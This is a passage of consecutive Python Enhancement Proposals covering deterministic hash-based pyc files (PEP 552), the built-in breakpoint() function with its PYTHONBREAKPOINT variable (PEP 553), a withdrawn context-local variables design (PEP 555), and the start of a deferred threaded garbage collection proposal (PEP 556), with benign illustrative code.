Holmes for invaluable insights into the info-sec field and PowerShell’s
responses, and Brett Cannon for the restraining and grounding
discussions.
Copyright
Copyright (c) 2017-2018 by Microsoft Corporation. This material may be
distributed only subject to the terms and conditions set forth in the
Open Publication License, v1.0 or later (the latest version is presently
available at http://www.opencontent.org/openpub/).
| Withdrawn | PEP 551 – Security transparency in the Python runtime | Informational | This PEP describes the concept of security transparency and how it
applies to the Python runtime. Visibility into actions taken by the
runtime is invaluable in integrating Python into an otherwise secure
and/or monitored environment. |
PEP 552 – Deterministic pycs
Author:
Benjamin Peterson <benjamin at python.org>
Status:
Final
Type:
Standards Track
Created:
04-Sep-2017
Python-Version:
3.7
Post-History:
07-Sep-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Specification
References
Credits
Copyright
Abstract
This PEP proposes an extension to the pyc format to make it more deterministic.
Rationale
A reproducible build is one where the same byte-for-byte output is generated
every time the same sources are built—even across different machines (naturally
subject to the requirement that they have rather similar environments
set up). Reproducibility is important for security. It is also a key concept in
content-based build systems such as Bazel, which are most effective when the
output files’ contents are a deterministic function of the input files’
contents.
The current Python pyc format is the marshaled code object of the module
prefixed by a magic number, the source timestamp, and the source file
size. The presence of a source timestamp means that a pyc is not a deterministic
function of the input file’s contents—it also depends on volatile metadata, the
mtime of the source. Thus, pycs are a barrier to proper reproducibility.
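As a minimal illustration of the problem (file names here are hypothetical),
compiling the same unchanged source twice with different mtimes yields
byte-for-byte different pycs, because only the embedded timestamp differs:

import os
import py_compile

# "mymodule.py" is a hypothetical source file used for demonstration.
py_compile.compile("mymodule.py", cfile="first.pyc")
os.utime("mymodule.py", (0, 0))          # force a different source mtime
py_compile.compile("mymodule.py", cfile="second.pyc")

with open("first.pyc", "rb") as f, open("second.pyc", "rb") as g:
    print(f.read() == g.read())          # False: only the header mtime differs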
Distributors of Python code are currently stuck with the options of
not distributing pycs and losing the caching advantages
distributing pycs and losing reproducibility
carefully giving all Python source files a deterministic timestamp
(see, for example, https://github.com/python/cpython/pull/296)
doing a complicated mixture of 1. and 2. like generating pycs at installation
time
None of these options are very attractive. This PEP proposes allowing the
timestamp to be replaced with a deterministic hash. The current timestamp
invalidation method will remain the default, though. Despite its nondeterminism,
timestamp invalidation works well for many workflows and use cases. The
hash-based pyc format can impose the cost of reading and hashing every source
file, which is more expensive than simply checking timestamps. Thus, for now, we
expect it to be used mainly by distributors and power use cases.
(Note there are other problems [1] [2] we do not
address here that can make pycs non-deterministic.)
Specification
The pyc header currently consists of 3 32-bit words. We will expand it to 4. The
first word will continue to be the magic number, versioning the bytecode and pyc
format. The second word, conceptually the new word, will be a bit field. The
interpretation of the rest of the header and invalidation behavior of the pyc
depends on the contents of the bit field.
If the bit field is 0, the pyc is a traditional timestamp-based pyc. I.e., the
third and fourth words will be the timestamp and file size respectively, and
invalidation will be done by comparing the metadata of the source file with that
in the header.
If the lowest bit of the bit field is set, the pyc is a hash-based pyc. We call
the second lowest bit the check_source flag. Following the bit field is a
64-bit hash of the source file. We will use SipHash with a hardcoded key to
hash the contents of the source file. Another fast hash like MD5 or BLAKE2 would
also work. We choose SipHash because Python already has a builtin implementation
of it from PEP 456, although an interface that allows picking the SipHash key
must be exposed to Python. Security of the hash is not a concern, though we pass
over completely-broken hashes like MD5 to ease auditing of Python in controlled
environments.
When Python encounters a hash-based pyc, its behavior depends on the setting of
the check_source flag. If the check_source flag is set, Python will
determine the validity of the pyc by hashing the source file and comparing the
hash with the expected hash in the pyc. If the pyc needs to be regenerated, it
will be regenerated as a hash-based pyc again with the check_source flag
set.
For hash-based pycs with the check_source unset, Python will simply load the
pyc without checking the hash of the source file. The expectation in this case
is that some external system (e.g., the local Linux distribution’s package
manager) is responsible for keeping pycs up to date, so Python itself doesn’t
have to check. Even when validation is disabled, the hash field should be set
correctly, so out-of-band consistency checkers can verify the up-to-dateness of
the pyc. Note also that the PEP 3147 edict that pycs without corresponding
source files not be loaded will still be enforced for hash-based pycs.
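A small sketch of reading the header as laid out above (little-endian words,
matching CPython's on-disk format; the function name is illustrative):

import struct

def read_pyc_header(path):
    # 4 words: magic, bit field, then either (mtime, size) or a 64-bit hash.
    with open(path, "rb") as f:
        magic = f.read(4)
        flags, = struct.unpack("<I", f.read(4))
        if flags & 0b01:                         # hash-based pyc
            check_source = bool(flags & 0b10)    # the check_source flag
            source_hash = f.read(8)
            return magic, "hash", check_source, source_hash
        mtime, size = struct.unpack("<II", f.read(8))
        return magic, "timestamp", mtime, size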
The programmatic APIs of py_compile and compileall will support
generation of hash-based pycs. Principally, py_compile will define a new
enumeration corresponding to all the available pyc invalidation modes:
from enum import Enum, auto

class PycInvalidationMode(Enum):
    TIMESTAMP = auto()
    CHECKED_HASH = auto()
    UNCHECKED_HASH = auto()
py_compile.compile, compileall.compile_dir, and
compileall.compile_file will all gain an invalidation_mode parameter,
which accepts a value of the PycInvalidationMode enumeration.
The compileall tool will be extended with a new command-line option,
--invalidation-mode to generate hash-based pycs with and without the
check_source bit set. --invalidation-mode will be a tristate option
taking values timestamp (the default), checked-hash, and
unchecked-hash corresponding to the values of PycInvalidationMode.
importlib.util will be extended with a source_hash(source) function that
computes the hash used by the pyc writing code for a bytestring source.
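For example (the module name is hypothetical), a checked hash-based pyc can be
produced programmatically, and the embedded hash recomputed for out-of-band
verification; the command-line equivalent is
python -m compileall --invalidation-mode checked-hash <directory>:

import importlib.util
import py_compile

# "mymodule.py" is a hypothetical source file used for demonstration.
py_compile.compile(
    "mymodule.py",
    invalidation_mode=py_compile.PycInvalidationMode.CHECKED_HASH,
)

with open("mymodule.py", "rb") as f:
    expected = importlib.util.source_hash(f.read())
print(expected.hex())   # the 8-byte hash embedded in the pyc header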
Runtime configuration of hash-based pyc invalidation will be facilitated by a
new --check-hash-based-pycs interpreter option. This is a tristate option,
which may take 3 values: default, always, and never. The default
value, default, means the check_source flag in hash-based pycs
determines invalidation as described above. always causes the interpreter to
hash the source file for invalidation regardless of value of check_source
bit. never causes the interpreter to always assume hash-based pycs are
valid. When --check-hash-based-pycs=never is in effect, unchecked hash-based
pycs will be regenerated as unchecked hash-based pycs. Timestamp-based pycs are
unaffected by --check-hash-based-pycs.
References
[1]
http://benno.id.au/blog/2013/01/15/python-determinism
[2]
http://bugzilla.opensuse.org/show_bug.cgi?id=1049186
Credits
The author would like to thank Gregory P. Smith, Christian Heimes, and Steve
Dower for useful conversations on the topic of this PEP.
Copyright
This document has been placed in the public domain.
| Final | PEP 552 – Deterministic pycs | Standards Track | This PEP proposes an extension to the pyc format to make it more deterministic. |
PEP 553 – Built-in breakpoint()
Author:
Barry Warsaw <barry at python.org>
Status:
Final
Type:
Standards Track
Created:
05-Sep-2017
Python-Version:
3.7
Post-History:
05-Sep-2017, 07-Sep-2017, 13-Sep-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Proposal
Environment variable
Implementation
Rejected alternatives
A new keyword
sys.breakpoint()
Version History
References
Copyright
Abstract
This PEP proposes adding a new built-in function called breakpoint() which
enters a Python debugger at the point of the call. Additionally, two new
names are added to the sys module to make the choice of which debugger is
entered configurable.
Rationale
Python has long had a great debugger in its standard library called pdb.
Setting a break point is commonly written like this:
foo()
import pdb; pdb.set_trace()
bar()
Thus after executing foo() and before executing bar(), Python will
enter the debugger. However this idiom has several disadvantages.
It’s a lot to type (27 characters).
It’s easy to typo. The PEP author often mistypes this line, e.g. omitting
the semicolon, or typing a dot instead of an underscore.
It ties debugging directly to the choice of pdb. There might be other
debugging options, say if you’re using an IDE or some other development
environment.
Python linters (e.g. flake8 [linters]) complain about this line because it
contains two statements. Breaking the idiom up into two lines complicates
its use because there are more opportunities for mistakes at clean up time.
I.e. you might forget to delete one of those lines when you no longer need
to debug the code.
Python developers also have many other debuggers to choose from, but
remembering how to invoke them can be problematic. For example, even when
IDEs have a user interface for setting breakpoints, it may still be more
convenient to just edit the code. The APIs for entering the debugger
programmatically are inconsistent, so it can be difficult to remember exactly
what to type.
We can solve all these problems by providing a universal API for entering the
debugger, as proposed in this PEP.
Proposal
The JavaScript language provides a debugger statement [js-debugger] which enters
the debugger at the point where the statement appears.
This PEP proposes a new built-in function called breakpoint()
which enters a Python debugger at the call site. Thus the example
above would be written like so:
foo()
breakpoint()
bar()
Further, this PEP proposes two new name bindings for the sys
module, called sys.breakpointhook() and
sys.__breakpointhook__. By default, sys.breakpointhook()
implements the actual importing and entry into pdb.set_trace(),
and it can be set to a different function to change the debugger that
breakpoint() enters.
sys.__breakpointhook__ is initialized to the same function as
sys.breakpointhook() so that you can always easily reset
sys.breakpointhook() to the default value (e.g. by doing
sys.breakpointhook = sys.__breakpointhook__). This is exactly the same as
how the existing sys.displayhook() / sys.__displayhook__ and
sys.excepthook() / sys.__excepthook__ work [hooks].
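For example, a custom hook can be installed and later restored (the hook name
here is purely illustrative):

import sys

def noisy_hook(*args, **kwargs):
    # Illustrative replacement hook: report instead of entering a debugger.
    print("breakpoint() called with", args, kwargs)

sys.breakpointhook = noisy_hook              # breakpoint() now calls noisy_hook
breakpoint("checkpoint A")                   # prints instead of entering pdb
sys.breakpointhook = sys.__breakpointhook__  # restore the default behaviour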
The signature of the built-in is breakpoint(*args, **kws). The positional
and keyword arguments are passed straight through to sys.breakpointhook()
and the signatures must match or a TypeError will be raised. The return
from sys.breakpointhook() is passed back up to, and returned from
breakpoint().
The rationale for this is based on the observation that the underlying
debuggers may accept additional optional arguments. For example, IPython
allows you to specify a string that gets printed when the break point is
entered [ipython-embed]. As of Python 3.7, the pdb module also supports an
optional header argument [pdb-header].
Environment variable
The default implementation of sys.breakpointhook() consults a new
environment variable called PYTHONBREAKPOINT. This environment variable
can have various values:
PYTHONBREAKPOINT=0 disables debugging. Specifically, with this value
sys.breakpointhook() returns None immediately.
PYTHONBREAKPOINT= (i.e. the empty string). This is the same as not
setting the environment variable at all, in which case pdb.set_trace()
is run as usual.
PYTHONBREAKPOINT=some.importable.callable. In this case,
sys.breakpointhook() imports the some.importable module and gets the
callable object from the resulting module, which it then calls. The
value may be a string with no dots, in which case it names a built-in
callable, e.g. PYTHONBREAKPOINT=int. (Guido has expressed the
preference for normal Python dotted-paths, not setuptools-style entry point
syntax [syntax].)
This environment variable allows external processes to control how breakpoints
are handled. Some use cases include:
Completely disabling all accidental breakpoint() calls pushed to
production. This could be accomplished by setting PYTHONBREAKPOINT=0 in
the execution environment. Another suggestion by reviewers of the PEP was
to set PYTHONBREAKPOINT=sys.exit in this case.
IDE integration with specialized debuggers for embedded execution. The IDE
would run the program in its debugging environment with PYTHONBREAKPOINT
set to their internal debugging hook.
PYTHONBREAKPOINT is re-interpreted every time sys.breakpointhook() is
reached. This allows processes to change its value during the execution of a
program and have breakpoint() respond to those changes. It is not
considered a performance critical section since entering a debugger by
definition stops execution. Thus, programs can do the following:
import os

os.environ['PYTHONBREAKPOINT'] = 'foo.bar.baz'
breakpoint()    # Imports foo.bar and calls foo.bar.baz()
Overriding sys.breakpointhook defeats the default consultation of
PYTHONBREAKPOINT. It is up to the overriding code to consult
PYTHONBREAKPOINT if they want.
If access to the PYTHONBREAKPOINT callable fails in any way (e.g. the
import fails, or the resulting module does not contain the callable), a
RuntimeWarning is issued, and no breakpoint function is called.
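For instance, an unimportable value degrades to a warning rather than an error
(a small sketch; the dotted path is deliberately bogus):

import os
import warnings

os.environ["PYTHONBREAKPOINT"] = "no.such.module.set_trace"  # bogus on purpose
with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    breakpoint()                      # import fails, so no debugger is entered
print(caught[0].category)             # <class 'RuntimeWarning'>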
Note that as with all other PYTHON* environment variables,
PYTHONBREAKPOINT is ignored when the interpreter is started with
-E. This means the default behavior will occur
(i.e. pdb.set_trace() will run). There was some discussion about
alternatively treating PYTHONBREAKPOINT=0 when -E as in
effect, but the opinions were inconclusive, so it was decided that
this wasn’t special enough for a special case.
Implementation
A pull request exists with the proposed implementation [impl].
While the actual implementation is in C, the Python pseudo-code for this
feature looks roughly like the following:
# In builtins.
def breakpoint(*args, **kws):
    import sys
    missing = object()
    hook = getattr(sys, 'breakpointhook', missing)
    if hook is missing:
        raise RuntimeError('lost sys.breakpointhook')
    return hook(*args, **kws)

# In sys.
def breakpointhook(*args, **kws):
    import importlib, os, warnings
    hookname = os.getenv('PYTHONBREAKPOINT')
    if hookname is None or len(hookname) == 0:
        hookname = 'pdb.set_trace'
    elif hookname == '0':
        return None
    modname, dot, funcname = hookname.rpartition('.')
    if dot == '':
        modname = 'builtins'
    try:
        module = importlib.import_module(modname)
        hook = getattr(module, funcname)
    except:
        warnings.warn(
            'Ignoring unimportable $PYTHONBREAKPOINT: {}'.format(
                hookname),
            RuntimeWarning)
        return None
    return hook(*args, **kws)

__breakpointhook__ = breakpointhook
Rejected alternatives
A new keyword
Originally, the author considered a new keyword, or an extension to an
existing keyword such as break here. This is rejected on several fronts.
A brand new keyword would require a __future__ to enable it since almost
any new keyword could conflict with existing code. This negates the ease
with which you can enter the debugger.
An extended keyword such as break here, while more readable and not
requiring a __future__ would tie the keyword extension to this new
feature, preventing more useful extensions such as those proposed in
PEP 548.
A new keyword would require a modified grammar and likely a new bytecode.
Each of these makes the implementation more complex. A new built-in breaks
no existing code (since any existing module global would just shadow the
built-in) and is quite easy to implement.
sys.breakpoint()
Why not sys.breakpoint()? Requiring an import to invoke the debugger is
explicitly rejected because sys is not imported in every module. That
just requires more typing and would lead to:
import sys; sys.breakpoint()
which inherits several of the problems this PEP aims to solve.
Version History
2019-10-13
Add missing return None in except clause to pseudo-code.
2017-09-13
The PYTHONBREAKPOINT environment variable is made a first class
feature.
2017-09-07
debug() renamed to breakpoint()
Signature changed to breakpoint(*args, **kws) which is passed straight
through to sys.breakpointhook().
References
[ipython-embed]
http://ipython.readthedocs.io/en/stable/api/generated/IPython.terminal.embed.html
[pdb-header]
https://docs.python.org/3.7/library/pdb.html#pdb.set_trace
[linters]
http://flake8.readthedocs.io/en/latest/
[js-debugger]
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/debugger
[hooks]
https://docs.python.org/3/library/sys.html#sys.displayhook
[syntax]
http://setuptools.readthedocs.io/en/latest/setuptools.html?highlight=console#automatic-script-creation
[impl]
https://github.com/python/cpython/pull/3355
Copyright
This document has been placed in the public domain.
| Final | PEP 553 – Built-in breakpoint() | Standards Track | This PEP proposes adding a new built-in function called breakpoint() which
enters a Python debugger at the point of the call. Additionally, two new
names are added to the sys module to make the choice of which debugger is
entered configurable. |
PEP 555 – Context-local variables (contextvars)
Author:
Koos Zevenhoven
Status:
Withdrawn
Type:
Standards Track
Created:
06-Sep-2017
Python-Version:
3.7
Post-History:
06-Sep-2017
Table of Contents
Abstract
Rationale
Proposal
Semantics and higher-level API
Core concept
Refactoring into subroutines
Semantics for generators and generator-based coroutines
Special functionality for framework authors
Leaking yields
Capturing contextvar assignments
Getting a snapshot of context state
Running code in a clean state
Implementation
Data structures and implementation of the core concept
Implementation of generator and coroutine semantics
More on implementation
Backwards compatibility
Open Issues
Out-of-order de-assignments
Rejected Ideas
Dynamic scoping linked to subroutine scopes
Acknowledgements
References
Copyright
Abstract
Sometimes, in special cases, it is desired that code can pass information down the function call chain to the callees without having to explicitly pass the information as arguments to each function in the call chain. This proposal describes a construct which allows code to explicitly switch in and out of a context where a certain context variable has a given value assigned to it. This is a modern alternative to some uses of things like global variables in traditional single-threaded (or thread-unsafe) code and of thread-local storage in traditional concurrency-unsafe code (single- or multi-threaded). In particular, the proposed mechanism can also be used with more modern concurrent execution mechanisms such as asynchronously executed coroutines, without the concurrently executed call chains interfering with each other’s contexts.
The “call chain” can consist of normal functions, awaited coroutines, or generators. The semantics of context variable scope are equivalent in all cases, allowing code to be refactored freely into subroutines (which here refers to functions, sub-generators or sub-coroutines) without affecting the semantics of context variables. Regarding implementation, this proposal aims at simplicity and minimum changes to the CPython interpreter and to other Python interpreters.
Rationale
Consider a modern Python call chain (or call tree), which in this proposal refers to any chained (nested) execution of subroutines, using any possible combinations of normal function calls, or expressions using await or yield from. In some cases, passing necessary information down the call chain as arguments can substantially complicate the required function signatures, or it can even be impossible to achieve in practice. In these cases, one may search for another place to store this information. Let us look at some historical examples.
The most naive option is to assign the value to a global variable or similar, where the code down the call chain can access it. However, this immediately makes the code thread-unsafe, because with multiple threads, all threads assign to the same global variable, and another thread can interfere at any point in the call chain. Sooner or later, someone will probably find a reason to run the same code in parallel threads.
A somewhat less naive option is to store the information as per-thread information in thread-local storage, where each thread has its own “copy” of the variable which other threads cannot interfere with. Although non-ideal, this has been the best solution in many cases. However, thanks to generators and coroutines, the execution of the call chain can be suspended and resumed, allowing code in other contexts to run concurrently. Therefore, using thread-local storage is concurrency-unsafe, because other call chains in other contexts may interfere with the thread-local variable.
Note that in the above two historical approaches, the stored information has the widest available scope without causing problems. For a third solution along the same path, one would first define an equivalent of a “thread” for asynchronous execution and concurrency. This could be seen as the largest amount of code and nested calls that is guaranteed to be executed sequentially without ambiguity in execution order. This might be referred to as concurrency-local or task-local storage. In this meaning of “task”, there is no ambiguity in the order of execution of the code within one task. (This concept of a task is close to equivalent to a Task in asyncio, but not exactly.) In such concurrency-locals, it is possible to pass information down the call chain to callees without another code path interfering with the value in the background.
Common to the above approaches is that they indeed use variables with a wide but just-narrow-enough scope. Thread-locals could also be called thread-wide globals—in single-threaded code, they are indeed truly global. And task-locals could be called task-wide globals, because tasks can be very big.
The issue here is that neither global variables, thread-locals nor task-locals are really meant to be used for this purpose of passing information of the execution context down the call chain. Instead of the widest possible variable scope, the scope of the variables should be controlled by the programmer, typically of a library, to have the desired scope—not wider. In other words, task-local variables (and globals and thread-locals) have nothing to do with the kind of context-bound information passing that this proposal intends to enable, even if task-locals can be used to emulate the desired semantics. Therefore, in the following, this proposal describes the semantics and the outlines of an implementation for context-local variables (or context variables, contextvars). In fact, as a side effect of this PEP, an async framework can use the proposed feature to implement task-local variables.
Proposal
Because the proposed semantics are not a direct extension to anything already available in Python, this proposal is first described in terms of semantics and API at a fairly high level. In particular, Python with statements are heavily used in the description, as they are a good match with the proposed semantics. However, the underlying __enter__ and __exit__ methods correspond to functions in the lower-level speed-optimized (C) API. For clarity of this document, the lower-level functions are not explicitly named in the definition of the semantics. After describing the semantics and high-level API, the implementation is described, going to a lower level.
Semantics and higher-level API
Core concept
A context-local variable is represented by a single instance of contextvars.Var, say cvar. Any code that has access to the cvar object can ask for its value with respect to the current context. In the high-level API, this value is given by the cvar.value property:
cvar = contextvars.Var(default="the default value",
description="example context variable")
assert cvar.value == "the default value" # default still applies
# In code examples, all ``assert`` statements should
# succeed according to the proposed semantics.
No assignments to cvar have been applied for this context, so cvar.value gives the default value. Assigning new values to contextvars is done in a highly scope-aware manner:
with cvar.assign(new_value):
    assert cvar.value is new_value
    # Any code here, or down the call chain from here, sees:
    #     cvar.value is new_value
    # unless another value has been assigned in a
    # nested context
    assert cvar.value is new_value
# the assignment of ``cvar`` to ``new_value`` is no longer visible
assert cvar.value == "the default value"
Here, cvar.assign(value) returns another object, namely contextvars.Assignment(cvar, new_value). The essential part here is that applying a context variable assignment (Assignment.__enter__) is paired with a de-assignment (Assignment.__exit__). These operations set the bounds for the scope of the assigned value.
Assignments to the same context variable can be nested to override the outer assignment in a narrower context:
assert cvar.value == "the default value"
with cvar.assign("outer"):
    assert cvar.value == "outer"
    with cvar.assign("inner"):
        assert cvar.value == "inner"
    assert cvar.value == "outer"
assert cvar.value == "the default value"
Also multiple variables can be assigned to in a nested manner without affecting each other:
cvar1 = contextvars.Var()
cvar2 = contextvars.Var()

assert cvar1.value is None  # default is None by default
assert cvar2.value is None

with cvar1.assign(value1):
    assert cvar1.value is value1
    assert cvar2.value is None
    with cvar2.assign(value2):
        assert cvar1.value is value1
        assert cvar2.value is value2
    assert cvar1.value is value1
    assert cvar2.value is None

assert cvar1.value is None
assert cvar2.value is None
Or with more convenient Python syntax:
with cvar1.assign(value1), cvar2.assign(value2):
    assert cvar1.value is value1
    assert cvar2.value is value2
In another context, in another thread or otherwise concurrently executed task or code path, the context variables can have a completely different state. The programmer thus only needs to worry about the context at hand.
Refactoring into subroutines
Code using contextvars can be refactored into subroutines without affecting the semantics. For instance:
assi = cvar.assign(new_value)

def apply():
    assi.__enter__()

assert cvar.value == "the default value"
apply()
assert cvar.value is new_value
assi.__exit__()
assert cvar.value == "the default value"
Or similarly in an asynchronous context where await expressions are used. The subroutine can now be a coroutine:
assi = cvar.assign(new_value)

async def apply():
    assi.__enter__()

assert cvar.value == "the default value"
await apply()
assert cvar.value is new_value
assi.__exit__()
assert cvar.value == "the default value"
Or when the subroutine is a generator:
def apply():
    yield
    assi.__enter__()
which is called using yield from apply() or with calls to next or .send. This is discussed further in later sections.
Semantics for generators and generator-based coroutines
Generators, coroutines and async generators act as subroutines in much the same way that normal functions do. However, they have the additional possibility of being suspended by yield expressions. Assignment contexts entered inside a generator are normally preserved across yields:
def genfunc():
    with cvar.assign(new_value):
        assert cvar.value is new_value
        yield
        assert cvar.value is new_value

g = genfunc()
next(g)
assert cvar.value == "the default value"
with cvar.assign(another_value):
    next(g)
However, the outer context visible to the generator may change state across yields:
def genfunc():
    assert cvar.value is value2
    yield
    assert cvar.value is value1
    yield
    with cvar.assign(value3):
        assert cvar.value is value3

with cvar.assign(value1):
    g = genfunc()
    with cvar.assign(value2):
        next(g)
    next(g)
    next(g)
    assert cvar.value is value1
Similar semantics apply to async generators (defined by async def ... yield ...).
By default, values assigned inside a generator do not leak through yields to the code that drives the generator. However, the assignment contexts entered and left open inside the generator do become visible outside the generator after the generator has finished with a StopIteration or another exception:
assi = cvar.assign(new_value)

def genfunc():
    yield
    assi.__enter__()
    yield

g = genfunc()
assert cvar.value == "the default value"
next(g)
assert cvar.value == "the default value"
next(g)  # assi.__enter__() is called here
assert cvar.value == "the default value"
next(g)
assert cvar.value is new_value
assi.__exit__()
Special functionality for framework authors
Frameworks, such as asyncio or third-party libraries, can use additional functionality in contextvars to achieve the desired semantics in cases which are not determined by the Python interpreter. Some of the semantics described in this section are also afterwards used to describe the internal implementation.
Leaking yields
Using the contextvars.leaking_yields decorator, one can choose to leak the context through yield expressions into the outer context that drives the generator:
@contextvars.leaking_yields
def genfunc():
    assert cvar.value == "outer"
    with cvar.assign("inner"):
        yield
        assert cvar.value == "inner"
    assert cvar.value == "outer"

g = genfunc()
with cvar.assign("outer"):
    assert cvar.value == "outer"
    next(g)
    assert cvar.value == "inner"
    next(g)
    assert cvar.value == "outer"
Capturing contextvar assignments
Using contextvars.capture(), one can capture the assignment contexts that are entered by a block of code. The changes applied by the block of code can then be reverted and subsequently reapplied, even in another context:
assert cvar1.value is None  # default
assert cvar2.value is None  # default

assi1 = cvar1.assign(value1)
assi2 = cvar1.assign(value2)
with contextvars.capture() as delta:
    assi1.__enter__()
    with cvar2.assign("not captured"):
        assert cvar2.value is "not captured"
    assi2.__enter__()
assert cvar1.value is value2
delta.revert()
assert cvar1.value is None
assert cvar2.value is None

...

with cvar1.assign(1), cvar2.assign(2):
    delta.reapply()
    assert cvar1.value is value2
    assert cvar2.value == 2
However, reapplying the “delta” if its net contents include deassignments may not be possible (see also Implementation and Open Issues).
Getting a snapshot of context state
The function contextvars.get_local_state() returns an object representing the applied assignments to all context-local variables in the context where the function is called. This can be seen as equivalent to using contextvars.capture() to capture all context changes from the beginning of execution. The returned object supports methods .revert() and reapply() as above.
Running code in a clean state
Although it is possible to revert all applied context changes using the above primitives, a more convenient way to run a block of code in a clean context is provided:
with contextvars.clean_context():
    # here, all context vars start off with their default values
# here, the state is back to what it was before the with block.
Implementation
This section describes to a variable level of detail how the described semantics can be implemented. At present, an implementation aimed at simplicity but sufficient features is described. More details will be added later.
Alternatively, a somewhat more complicated implementation offers minor additional features while adding some performance overhead and requiring more code in the implementation.
Data structures and implementation of the core concept
Each thread of the Python interpreter keeps its own stack of contextvars.Assignment objects, each having a pointer to the previous (outer) assignment like in a linked list. The local state (also returned by contextvars.get_local_state()) then consists of a reference to the top of the stack and a pointer/weak reference to the bottom of the stack. This allows efficient stack manipulations. An object produced by contextvars.capture() is similar, but refers to only a part of the stack with the bottom reference pointing to the top of the stack as it was in the beginning of the capture block.
Now, the stack evolves according to the assignment __enter__ and __exit__ methods. For example:
cvar1 = contextvars.Var()
cvar2 = contextvars.Var()

# stack: []
assert cvar1.value is None
assert cvar2.value is None

with cvar1.assign("outer"):
    # stack: [Assignment(cvar1, "outer")]
    assert cvar1.value == "outer"
    with cvar1.assign("inner"):
        # stack: [Assignment(cvar1, "outer"),
        #         Assignment(cvar1, "inner")]
        assert cvar1.value == "inner"
        with cvar2.assign("hello"):
            # stack: [Assignment(cvar1, "outer"),
            #         Assignment(cvar1, "inner"),
            #         Assignment(cvar2, "hello")]
            assert cvar2.value == "hello"
        # stack: [Assignment(cvar1, "outer"),
        #         Assignment(cvar1, "inner")]
        assert cvar1.value == "inner"
        assert cvar2.value is None
    # stack: [Assignment(cvar1, "outer")]
    assert cvar1.value == "outer"
# stack: []
assert cvar1.value is None
assert cvar2.value is None
Getting a value from the context using cvar1.value can be implemented as finding the topmost occurrence of a cvar1 assignment on the stack and returning the value there, or the default value if no assignment is found on the stack. However, this can be optimized to instead be an O(1) operation in most cases. Still, even searching through the stack may be reasonably fast since these stacks are not intended to grow very large.
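To make the stack discipline concrete, here is a minimal, single-thread-aware
toy model of the proposed objects; this is not the contextvars module that
later shipped with Python, and it omits the O(1) caching and the generator
integration discussed below:

import threading

_state = threading.local()        # one assignment stack per thread

def _stack():
    if not hasattr(_state, "stack"):
        _state.stack = []
    return _state.stack

class Var:
    def __init__(self, default=None):
        self.default = default

    @property
    def value(self):
        # Topmost assignment of this variable wins, else the default.
        for assignment in reversed(_stack()):
            if assignment.var is self:
                return assignment.new_value
        return self.default

    def assign(self, new_value):
        return Assignment(self, new_value)

class Assignment:
    def __init__(self, var, new_value):
        self.var = var
        self.new_value = new_value

    def __enter__(self):
        _stack().append(self)

    def __exit__(self, *exc):
        popped = _stack().pop()
        assert popped is self     # de-assignments must be in reverse order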
The above description is already sufficient for implementing the core concept. Suspendable frames require some additional attention, as explained in the following.
Implementation of generator and coroutine semantics
Within generators, coroutines and async generators, assignments and deassignments are handled in exactly the same way as anywhere else. However, some changes are needed in the builtin generator methods send, __next__, throw and close. Here is the Python equivalent of the changes needed in send for a generator (here _old_send refers to the behavior in Python 3.6):
def send(self, value):
    if self.gi_contextvars is LEAK:
        # If decorated with contextvars.leaking_yields.
        # Nothing needs to be done to leak context through yields :)
        return self._old_send(value)
    try:
        with contextvars.capture() as delta:
            if self.gi_contextvars:
                # non-zero captured content from previous iteration
                self.gi_contextvars.reapply()
            ret = self._old_send(value)
    except Exception:
        raise  # back to the calling frame (e.g. StopIteration)
    else:
        # suspending, revert context changes but save them for later
        delta.revert()
        self.gi_contextvars = delta
        return ret
The corresponding modifications to the other methods is essentially identical. The same applies to coroutines and async generators.
For code that does not use contextvars, the additions are O(1) and essentially reduce to a couple of pointer comparisons. For code that does use contextvars, the additions are still O(1) in most cases.
More on implementation
The rest of the functionality, including contextvars.leaking_yields, contextvars.capture(), contextvars.get_local_state() and contextvars.clean_context() are in fact quite straightforward to implement, but their implementation will be discussed further in later versions of this proposal. Caching of assigned values is somewhat more complicated, and will be discussed later, but it seems that most cases should achieve O(1) complexity.
Backwards compatibility
There are no direct backwards-compatibility concerns, since a completely new feature is proposed.
However, various traditional uses of thread-local storage may need a smooth transition to contextvars so they can be concurrency-safe. There are several approaches to this, including emulating task-local storage with a little bit of help from async frameworks. A fully general implementation cannot be provided, because the desired semantics may depend on the design of the framework.
Another way to deal with the transition is for code to first look for a context created using contextvars. If that fails because a new-style context has not been set or because the code runs on an older Python version, a fallback to thread-local storage is used.
Open Issues
Out-of-order de-assignments
In this proposal, all variable deassignments are made in the opposite order compared to the preceding assignments. This has two useful properties: it encourages using with statements to define assignment scope and has a tendency to catch errors early (forgetting a .__exit__() call often results in a meaningful error). To have this as a requirement is beneficial also in terms of implementation simplicity and performance. Nevertheless, allowing out-of-order context exits is not completely out of the question, and reasonable implementation strategies for that do exist.
Rejected Ideas
Dynamic scoping linked to subroutine scopes
The scope of value visibility should not be determined by the way the code is refactored into subroutines. It is necessary to have per-variable control of the assignment scope.
Acknowledgements
To be added.
References
To be added.
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 555 – Context-local variables (contextvars) | Standards Track | Sometimes, in special cases, it is desired that code can pass information down the function call chain to the callees without having to explicitly pass the information as arguments to each function in the call chain. This proposal describes a construct which allows code to explicitly switch in and out of a context where a certain context variable has a given value assigned to it. This is a modern alternative to some uses of things like global variables in traditional single-threaded (or thread-unsafe) code and of thread-local storage in traditional concurrency-unsafe code (single- or multi-threaded). In particular, the proposed mechanism can also be used with more modern concurrent execution mechanisms such as asynchronously executed coroutines, without the concurrently executed call chains interfering with each other’s contexts. |
PEP 556 – Threaded garbage collection
Author:
Antoine Pitrou <solipsis at pitrou.net>
Status:
Deferred
Type:
Standards Track
Created:
08-Sep-2017
Python-Version:
3.7
Post-History:
08-Sep-2017
Table of Contents
Deferral Notice
Abstract
Terminology
Rationale
Proposal
New public APIs
Intended use
Non-goals
Internal details
gc module
threading module
Pseudo-code
Discussion
Default mode
Explicit collections
Impact on memory use
Impact on CPU consumption
Impact on GC pauses
Open issues
Implementation
References
Copyright
Deferral Notice
This PEP is currently not being actively worked on. It may be revived
in the future. The main missing steps are:
polish the implementation, adapting the test suite where necessary;
ensure setting threaded garbage collection does not disrupt existing
code in unexpected ways (expected impact includes lengthening the
lifetime of objects in reference cycles).
Abstract
This PEP proposes a new optional mode of operation for CPython’s cyclic
garbage collector (GC) where implicit (i.e. opportunistic) collections
happen in a dedicated thread rather than synchronously.
Terminology
